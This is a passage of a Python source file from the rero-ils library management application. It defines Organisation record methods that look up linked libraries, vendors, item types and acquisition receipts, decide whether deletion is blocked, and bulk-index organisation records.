        """Get record by online harvested source.

        :param source: the record source
        :return: Organisation record or None.
        """
        results = OrganisationsSearch().filter(
            'term', online_harvested_source=source).scan()
        try:
            # take the first hit only; multiple matches are not expected
            return Organisation.get_record_by_pid(next(results).pid)
        except StopIteration:
            return None
    @property
    def organisation_pid(self):
        """Get organisation pid (an organisation is its own organisation)."""
        return self.pid
    def online_circulation_category(self):
        """Get the default circulation category for online resources.

        :returns: pid of this organisation's 'online' item type, or None.
        """
        results = ItemTypesSearch().filter(
            'term', organisation__pid=self.pid).filter(
            'term', type='online').source(['pid']).scan()
        try:
            return next(results).pid
        except StopIteration:
            return None
    def get_online_locations(self):
        """Get list of online locations of all libraries (skips None)."""
        return [library.online_location
                for library in self.get_libraries() if library.online_location]
    def get_libraries_pids(self):
        """Yield all library pids related to the organisation."""
        results = LibrariesSearch().source(['pid'])\
            .filter('term', organisation__pid=self.pid)\
            .scan()
        for result in results:
            yield result.pid
    def get_libraries(self):
        """Yield all Library records related to the organisation."""
        pids = self.get_libraries_pids()
        for pid in pids:
            yield Library.get_record_by_pid(pid)
    def get_vendor_pids(self):
        """Yield all vendor pids related to the organisation."""
        results = VendorsSearch().source(['pid'])\
            .filter('term', organisation__pid=self.pid)\
            .scan()
        for result in results:
            yield result.pid
    def get_vendors(self):
        """Yield all Vendor records related to the organisation."""
        pids = self.get_vendor_pids()
        for pid in pids:
            yield Vendor.get_record_by_pid(pid)
    def get_links_to_me(self, get_pids=False):
        """Record links.

        :param get_pids: if True list of linked pids
                         if False count of linked records
        """
        # local import, presumably to avoid a circular module dependency
        from ..acq_receipts.api import AcqReceiptsSearch
        library_query = LibrariesSearch()\
            .filter('term', organisation__pid=self.pid)
        receipt_query = AcqReceiptsSearch() \
            .filter('term', organisation__pid=self.pid)
        links = {}
        if get_pids:
            libraries = sorted_pids(library_query)
            receipts = sorted_pids(receipt_query)
        else:
            libraries = library_query.count()
            receipts = receipt_query.count()
        if libraries:
            links['libraries'] = libraries
        if receipts:
            links['acq_receipts'] = receipts
        return links
    def reasons_not_to_delete(self):
        """Get reasons not to delete record.

        :returns: dict with a 'links' key when linked records exist,
                  empty dict when deletion is allowed.
        """
        cannot_delete = {}
        links = self.get_links_to_me()
        if links:
            cannot_delete['links'] = links
        return cannot_delete
    def is_test_organisation(self):
        """Check if this is a test organisation (code 'cypress')."""
        if self.get('code') == 'cypress':
            return True
        return False
class OrganisationsIndexer(IlsRecordsIndexer):
    """Organisation indexing class.

    (Docstring previously said "Holdings" -- copy-paste from the
    holdings module.)
    """
    record_cls = Organisation
    def bulk_index(self, record_id_iterator):
        """Bulk index records under the 'org' document type.

        :param record_id_iterator: Iterator yielding record UUIDs.
        """
        super().bulk_index(record_id_iterator, doc_type='org')
| rero/reroils-app | rero_ils/modules/organisations/api.py | Python | gpl-2.0 | 7,019 |